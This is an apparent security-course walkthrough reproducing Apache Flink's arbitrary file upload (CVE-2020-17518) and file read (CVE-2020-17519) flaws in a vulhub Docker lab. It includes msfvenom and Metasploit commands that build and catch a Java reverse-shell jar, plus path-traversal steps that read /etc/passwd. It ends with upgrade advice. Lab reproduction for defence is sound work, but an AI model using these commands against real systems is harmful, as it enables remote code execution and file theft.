Introduction
Apache Flink is an efficient and distributed general data processing platform. It is an open source stream processing framework developed by the Apache Software Foundation. Its core is a distributed stream data stream engine written in Java and Scala (in short, it is similar to spark) . Flink has a monitoring API that can be used to query the status and statistics of "running jobs" and "recently completed jobs". The monitoring API is used in Flink's own dashboard, and it can also be used to customize monitoring tools. The default monitoring is on port 8081.
This article involves practical exercises on knowledge points: Network Security Incidents ("Network Security Incidents" this course is composed of a test environment simulated by some relatively high-impact security incidents. This course will not only add past security incidents, but also tighten Follow current events and add the latest security incidents. Let everyone know the first time and know how to protect their own safety.)
The monitoring API is a REST-ful API, which accepts HTTP requests and responds to data in JSON format.
One of the monitoring APIs is /jars/upload, which is used to upload a jar to the cluster. The jar must be sent as multipart data. Make sure the "Content-Type" header is set to "application/x-java-archive" because some http libraries do not add headers by default. Jar files can be uploaded via curl
'curl -X POST -H "Expect:" -F "jarfile=@path/to/flink-job.jar" <http://hostname:port/jars/upload>;'
Overview
Flink 1.5.1 introduced the REST API, but there are many flaws in its implementation, resulting in arbitrary file reading (CVE-2020-17519) and arbitrary file writing (CVE-2020-17518) vulnerabilities.
CVE-2020-17518*** users can use the REST API to modify the HTTP header and write the uploaded file to any location on the local file system (accessible by the Flink 1.5.1 process).
CVE-2020-17519 Apache Flink 1.11.0 allows the hacker to read any file on the JobManager local file system (accessible by the JobManager process) through the REST API of the JobManager process.
Impact version
CVE-2020-17518
Apache: Apache Flink: 1.5.1 - 1.11.2
CVE-2020-17519
Apache: Apache Flink: 1.11.0, 1.11.1, 1.11.2
Environment setup
Because the versions affected by the two vulnerabilities include 1.11.2, this version is used to reproduce
Here we use the vulhub environment to reproduce and create a new docker-compose.yml
version: '2'
services:
hefty:
image: vulhub/flink:1.11.2
command: jobmanager
ports:
- "8081:8081"
- "6123:6123"
Use docker-compose to start the environment, execute the following command to download the image and start a container with this image, the mapped ports are 8081 and 6123
docker-compose up -d
accesshttp://ip:8081
Vulnerability recurrence
Any file upload (CVE-2020-17518) reproduces:
Apache Flink 1.5.1 introduces a REST handler, which allows the uploaded file to be written to any location on the local file system through a maliciously modified HTTP HEADER.
accesshttp://ip:8081 , find the Add New of Submit New Job and upload a jar package. You can create a compressed file for the jar package on the desktop, modify the zip suffix to jar, and then capture the package
The captured request packets are as follows:
Send the request package to the repeater module for modification. For example, here I am creating a new file in the /tmp directory, ../ is to facilitate the switch path, because we don’t know what the current path is, so we can use ../ to switch to Root directory.
Check if the file is uploaded successfully
docker ps view container
Enter the container
docker exec -it CONTAINER ID /bin/bash
You can see that the file was successfully uploaded
flink itself is not authenticated, and it supports the upload and execution of any jar package, so you can upload jar package getshell
Generate a horse in jar format
lhost is the ip of kali, lport is the port of kali receiving shell
msfvenom -p java/shell_reverse_tcp lhost=192.168.74.142 lport=1234 -f jar >/home/a.jar
Start msf to receive shell
msfconsole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.74.142
set LPORT 1234
exploit
After uploading the jar package, click the uploaded package and then Submit
Get to the shell
Arbitrary file reading (CVE-2020-17519) reproduces:
The changes introduced in Apache Flink 1.11.0 (and also released in 1.11.1 and 1.11.2) allow the administrator to read any file on the JobManager local file system through the REST interface of the JobManager process. Access is limited to files accessible by the JobManager process.
For example, I read the passwd file under /etc/ here, and %252f is the two URL encoding of /
Bug fix
The security version has been officially released, please download and upgrade to the security version in time.
<https://flink.apache.org/zh/downloads.html>;
Reference link